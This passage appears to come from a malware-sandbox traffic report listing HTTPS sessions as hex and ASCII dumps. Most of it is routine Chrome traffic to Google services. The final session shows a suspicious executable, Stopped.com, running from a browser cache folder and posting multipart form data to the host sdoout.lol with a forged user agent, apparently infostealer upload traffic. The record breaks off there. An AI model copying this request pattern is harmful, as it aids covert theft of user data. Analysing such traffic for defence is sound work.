10e5uVUZTRXBCSS9PVkpXNGZZcVRZQXF1R3c3eXVVUEgxcGZXdEw4ak5aUEo0L0tZN1RIbnZ3eElhRHhsaGdGS3lRTFRXeXVXajhpVkQ1OFJHVUNNcnRoOHNkSzRWZ1kvRnNBL2twbVMwak9MY2w1TWhYdzBwTWtLS1UwQXU3TmMxcjVnQVFUdHNLNE1ja2dBVnh1NTd2M3lxZDFCNVVyQ01hSFdTN0JtZWZFN2tLa3JuT0cxT0t2ZEliK3Zx
2024-12-31 15:57:42 UTC	1390	IN	Data Raw: 71 62 30 39 32 65 47 39 72 53 31 4e 5a 52 58 46 6a 53 32 4a 51 52 45 70 6c 56 32 70 50 65 57 39 74 55 32 52 59 53 56 4d 32 63 33 56 43 59 6e 46 6e 52 6b 6c 4c 59 56 4e 53 55 55 70 31 4c 31 51 35 61 6e 68 46 56 45 70 71 61 32 70 71 65 55 74 50 64 56 41 79 63 58 4e 35 52 57 51 31 61 6c 55 30 4d 58 4d 76 53 33 68 31 56 6e 6b 79 62 6c 64 59 62 45 70 34 63 56 6f 31 61 32 68 6e 5a 45 39 61 55 31 46 76 5a 6d 39 4d 52 7a 4e 54 65 47 5a 49 62 30 6c 42 52 31 5a 61 52 48 4a 6f 61 46 46 34 55 6d 35 33 59 32 74 4c 59 6e 70 56 62 47 74 49 4d 48 46 54 61 46 5a 6d 55 57 74 6d 65 54 52 34 4b 7a 4a 53 61 45 35 69 65 57 52 54 55 45 31 6d 61 57 70 4b 64 6d 70 6a 56 6e 6b 34 57 47 39 35 62 58 4d 72 65 54 68 53 63 33 52 44 61 79 39 61 56 69 39 35 4e 48 51 79 53 7a 4a 45 65 6e Data Ascii: qb092eG9rS1NZRXFjS2JQREplV2pPeW9tU2RYSVM2c3VCYnFnRklLYVNSUUp1L1Q5anhFVEpqa2pqeUtPdVAycXN5RWQ1alU0MXMvS3h1VnkybldYbEp4cVo1a2hnZE9aU1FvZm9MRzNTeGZIb0lBR1ZaRHJoaFF4Um53Y2tLYnpVbGtIMHFTaFZmUWtmeTR4KzJSaE5ieWRTUE1maWpKdmpjVnk4WG95bXMreThSc3RDay9aVi95NHQySzJEen
2024-12-31 15:57:42 UTC	1390	IN	Data Raw: 55 51 77 55 48 4e 6d 5a 6d 64 7a 63 31 4e 35 62 31 56 6a 59 6d 70 52 52 6c 6c 78 59 33 64 78 54 32 46 33 64 31 64 68 4d 43 74 74 5a 43 74 43 64 6e 5a 30 64 30 70 61 51 7a 56 56 57 6d 68 53 52 6b 56 6d 4d 55 70 79 5a 6d 78 51 5a 58 5a 76 59 6b 68 52 62 47 70 6c 61 55 35 73 64 48 4a 32 56 57 56 47 61 6d 39 33 4e 55 68 78 55 48 49 32 63 30 31 76 61 30 64 6b 55 47 31 50 56 6c 70 6a 53 45 68 34 62 56 4e 57 61 48 52 4d 4e 44 64 72 62 56 46 49 55 31 6f 72 56 32 74 47 63 32 39 4f 5a 32 4a 77 4f 54 42 42 51 55 70 47 5a 7a 63 34 64 7a 6c 36 65 48 4a 54 52 6a 46 36 55 33 52 31 54 32 64 76 53 46 64 71 53 30 64 74 4e 44 4a 78 56 33 52 4c 55 6d 4d 78 62 46 5a 4f 54 32 39 59 4f 46 46 34 53 58 41 78 62 48 46 72 4b 31 6c 72 53 55 74 78 56 56 4a 52 4e 6a 6c 51 4d 6a 52 56 Data Ascii: UQwUHNmZmdzc1N5b1VjYmpRRllxY3dxT2F3d1dhMCttZCtCdnZ0d0paQzVVWmhSRkVmMUpyZmxQZXZvYkhRbGplaU5sdHJ2VWVGam93NUhxUHI2c01va0dkUG1PVlpjSEh4bVNWaHRMNDdrbVFIU1orV2tGc29OZ2JwOTBBQUpGZzc4dzl6eHJTRjF6U3R1T2dvSFdqS0dtNDJxV3RLUmMxbFZOT29YOFF4SXAxbHFrK1lrSUtxVVJRNjlQMjRV
2024-12-31 15:57:42 UTC	163	IN	Data Raw: 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 22 45 4e 54 49 54 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 5d 7d 5d 0d 0a Data Ascii: 3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["ENTITY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]
2024-12-31 15:57:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49753	172.217.16.196	443	7476	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:57:43 UTC	518	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc= Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-31 15:57:43 UTC	1018	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Tue, 31 Dec 2024 15:57:43 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-31 15:57:43 UTC	372	IN	Data Raw: 31 37 34 62 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 174b)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-31 15:57:43 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-12-31 15:57:43 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-12-31 15:57:43 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-12-31 15:57:43 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-12-31 15:57:43 UTC	39	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 0d 0a Data Ascii: enu-content","metadata":{"bar_height"
2024-12-31 15:57:43 UTC	254	IN	Data Raw: 66 38 0d 0a 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 31 34 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 78 0d 0a Data Ascii: f8:60,"experiment_id":[3700314,3700949,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){var window\u003dthis;\ntry{\n_.x
2024-12-31 15:57:43 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 78 64 28 61 2c 62 2c 64 29 3b 65 6c 73 65 7b 64 5c 75 30 30 33 64 28 30 2c 5f 2e 7a 29 28 61 2e 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 65 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 63 2c 64 2c 21 31 29 3a 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 74 74 61 63 Data Ascii: 8000d\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)for(var d of c)_.xd(a,b,d);else{d\u003d(0,_.z)(a.C,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u003de;a.B[e]\u003dd;b\u0026\u0026b.addEventListener?b.addEventListener(c,d,!1):b\u0026\u0026b.attac
2024-12-31 15:57:43 UTC	1390	IN	Data Raw: 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 4a 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 49 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 46 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6e 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 4b 64 5c 75 30 30 33 64 5b 47 64 28 5c 22 64 61 74 61 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 47 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 47 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 46 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b 2f 3f 23 5d 7c 24 29 2f 2e 74 65 73 74 28 61 29 29 5d 3b 5f 2e 4c 64 5c 75 30 30 33 64 Data Ascii: ng(){return this.i}};_.Jd\u003dnew _.Id(\"about:invalid#zClosurez\");_.Fd\u003dclass{constructor(a){this.nh\u003da}};_.Kd\u003d[Gd(\"data\"),Gd(\"http\"),Gd(\"https\"),Gd(\"mailto\"),Gd(\"ftp\"),new _.Fd(a\u003d\u003e/^[^:]*([/?#]\|$)/.test(a))];_.Ld\u003d
2024-12-31 15:57:43 UTC	1390	IN	Data Raw: 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 4d 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 72 72 61 79 5c 22 7c 7c 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6f 62 6a 65 63 74 5c 22 Data Ascii: ent\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\":b.nonce\|\|b.getAttribute(\"nonce\")\|\|\"\"};\n_.$d\u003dfunction(a){var b\u003d_.Ma(a);return b\u003d\u003d\"array\"\|\|b\u003d\u003d\"object\"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49752	172.217.16.196	443	7476	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:57:43 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-31 15:57:43 UTC	933	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Tue, 31 Dec 2024 15:57:43 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-31 15:57:43 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-31 15:57:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	51507	142.250.181.238	443	7476	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:57:47 UTC	726	OUT	POST /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 913 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: / Origin: chrome-untrusted://new-tab-page X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-31 15:57:47 UTC	913	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 35 36 36 30 36 36 34 39 34 38 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1735660664948",null,null,null,
2024-12-31 15:57:47 UTC	941	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: chrome-untrusted://new-tab-page Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=520=qlwjMi09ATuCJXFdqSje9N7dr42JBKjiMzcunJN5qas4mwg9SaJkMJcL7H4GO-Hu7IgljZgAHbieqpRoQFVDqQjRBLOaHcbjFg2cP752ld77pOaOKF0wzjN-RVKzGfUdGeAT6JeDdosTI_npZZzUKj7C_g2XP8LPZveSF2R0jDXHzt7BgMYJUUY; expires=Wed, 02-Jul-2025 15:57:47 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Tue, 31 Dec 2024 15:57:47 GMT Server: Playlog X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Tue, 31 Dec 2024 15:57:47 GMT Cache-Control: private Connection: close Transfer-Encoding: chunked
2024-12-31 15:57:47 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-12-31 15:57:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	51510	116.203.14.4	443	7964	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com

Timestamp	Bytes transferred	Direction	Data
2024-12-31 15:57:48 UTC	275	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----tjmy5fkxba1n7ym79zmo User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: sdoout.lol Content-Length: 505 Connection: Keep-Alive Cache-Control: no-cache
